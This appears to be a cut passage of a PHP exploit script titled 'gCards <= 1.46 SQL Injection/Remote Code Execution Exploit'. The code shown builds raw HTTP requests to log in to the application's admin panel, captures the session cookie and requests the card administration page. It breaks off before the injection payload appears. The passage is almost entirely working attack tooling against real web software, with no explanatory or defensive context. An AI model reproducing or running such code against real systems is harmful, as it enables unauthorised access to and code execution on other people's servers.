#!/usr/bin/php -q -d short_open_tag=on '/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if ($exploit==0){ print "-------------------------------------------------------------------------\r\n"; print " gCards <= 1.46 SQL Injection/Remote Code Execution Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; echo "\r\n[+] Logging in..."; $data="username=" . $user; $data.="&userpass=" . $pass; $packet ="POST " . $path . "admin/admin.php HTTP/1.1\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"Authentication failed")){die("...Failed!\r\n"); exit();} else{echo "...Successful!\r\n";} $temp=explode("Set-Cookie: ",$html); $temp2=explode(" ",$temp[1]); $cookie=$temp2[0]; $packet ="GET " . $path . "admin/cards.php HTTP/1.1\r\n"; $packet.="Host: " . $host . "\r\n"; $packet.="Cookie: " . $cookie . "\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp3=explode("